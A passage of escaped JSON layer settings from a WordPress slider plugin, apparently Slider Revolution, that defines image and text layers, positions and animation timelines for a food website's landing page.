lse,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"11\":{\"text\":\"Image 11\",\"alias\":\"Image 11\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-cimet-img-4-2.png\",\"imageId\":3556},\"size\":{\"width\":{\"d\":{\"v\":\"495px\",\"e\":true},\"n\":{\"v\":\"395px\",\"e\":true},\"t\":{\"v\":\"395px\",\"e\":true},\"m\":{\"v\":\"395px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"329px\",\"e\":true},\"n\":{\"v\":\"263px\",\"e\":true},\"t\":{\"v\":\"263px\",\"e\":true},\"m\":{\"v\":\"263px\",\"e\":true}},\"originalWidth\":600,\"originalHeight\":399,\"aspectRatio\":{\"d\":{\"v\":1.5037593984962405},\"n\":{\"v\":1.5037593984962405},\"t\":{\"v\":1.5037593984962405},\"m\":{\"v\":1.5037593984962405}}},\"position\":{\"x\":{\"d\":{\"v\":\"14px\",\"e\":true},\"n\":{\"v\":\"147px\",\"e\":true},\"t\":{\"v\":\"-24px\",\"e\":true},\"m\":{\"v\":\"-578px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"43px\",\"e\":true},\"n\":{\"v\":\"-279px\",\"e\":true},\"t\":{\"v\":\"-35px\",\"e\":true},\"m\":{\"v\":\"347px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":15,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.in\",\"speed\":1000,\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"13\":{\"text\":\"Image 13\",\"alias\":\"Image 13\",\"uid\":13,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/03\\/landing-cinnamon-slider-2.png\",\"imageId\":4270},\"size\":{\"width\":{\"d\":{\"v\":\"709px\",\"e\":true},\"n\":{\"v\":\"468px\",\"e\":true},\"t\":{\"v\":\"371px\",\"e\":true},\"m\":{\"v\":\"371px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"830px\",\"e\":true},\"n\":{\"v\":\"547px\",\"e\":true},\"t\":{\"v\":\"434px\",\"e\":true},\"m\":{\"v\":\"434px\",\"e\":true}},\"originalWidth\":734,\"originalHeight\":843,\"aspectRatio\":{\"d\":{\"v\":0.8706998813760379},\"n\":{\"v\":0.8706998813760379},\"t\":{\"v\":0.8706998813760379},\"m\":{\"v\":0.8706998813760379}}},\"position\":{\"x\":{\"d\":{\"v\":\"228px\",\"e\":true},\"n\":{\"v\":\"354px\",\"e\":true},\"t\":{\"v\":\"116px\",\"e\":true},\"m\":{\"v\":\"496px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"155px\",\"e\":true},\"n\":{\"v\":\"-59px\",\"e\":true},\"t\":{\"v\":\"371px\",\"e\":true},\"m\":{\"v\":\"237px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":16,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":16,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"http:\\/\\/succulents.select-themes.com\\/home-6\\/\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"jump_to_slide\":\"\",\"scrollunder_offset\":\"\",\"action_easing\":\"none\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"14\":{\"text\":\"Image 14\",\"alias\":\"Image 14\",\"uid\":14,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/nova-vocka1.png\",\"imageId\":4611},\"size\":{\"width\":{\"d\":{\"v\":\"400px\",\"e\":true},\"n\":{\"v\":\"304px\",\"e\":true},\"t\":{\"v\":\"237px\",\"e\":true},\"m\":{\"v\":\"237px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"290px\",\"e\":true},\"n\":{\"v\":\"220px\",\"e\":true},\"t\":{\"v\":\"172px\",\"e\":true},\"m\":{\"v\":\"172px\",\"e\":true}},\"originalWidth\":400,\"originalHeight\":290,\"aspectRatio\":{\"d\":{\"v\":1.3793103448275863},\"n\":{\"v\":1.3793103448275863},\"t\":{\"v\":1.3793103448275863},\"m\":{\"v\":1.3793103448275863}}},\"position\":{\"x\":{\"d\":{\"v\":\"-190px\",\"e\":true},\"n\":{\"v\":\"12px\",\"e\":true},\"t\":{\"v\":\"-178px\",\"e\":true},\"m\":{\"v\":\"-447px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"398px\",\"e\":true},\"n\":{\"v\":\"343px\",\"e\":true},\"t\":{\"v\":\"376px\",\"e\":true},\"m\":{\"v\":\"255px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":17,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"-20deg\",\"rotationY\":\"-20deg\",\"rotationZ\":\"0deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1480,\"start\":9000,\"startRelative\":7490,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"15\":{\"text\":\"Image 15\",\"alias\":\"Image 15\",\"uid\":15,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/recept-11.png\",\"imageId\":4590},\"size\":{\"width\":{\"d\":{\"v\":\"541px\",\"e\":true},\"n\":{\"v\":\"428px\",\"e\":true},\"t\":{\"v\":\"344px\",\"e\":true},\"m\":{\"v\":\"333px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"645px\",\"e\":true},\"n\":{\"v\":\"510px\",\"e\":true},\"t\":{\"v\":\"410px\",\"e\":true},\"m\":{\"v\":\"396px\",\"e\":true}},\"originalWidth\":552,\"originalHeight\":657,\"aspectRatio\":{\"d\":{\"v\":0.8401826484018264},\"n\":{\"v\":0.8401826484018264},\"t\":{\"v\":0.8401826484018264},\"m\":{\"v\":0.8401826484018264}}},\"position\":{\"x\":{\"d\":{\"v\":\"83px\",\"e\":true},\"n\":{\"v\":\"213px\",\"e\":true},\"t\":{\"v\":\"-88px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"138px\",\"e\":true},\"n\":{\"v\":\"83px\",\"e\":true},\"t\":{\"v\":\"210px\",\"e\":true},\"m\":{\"v\":\"81px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":18,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":18,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 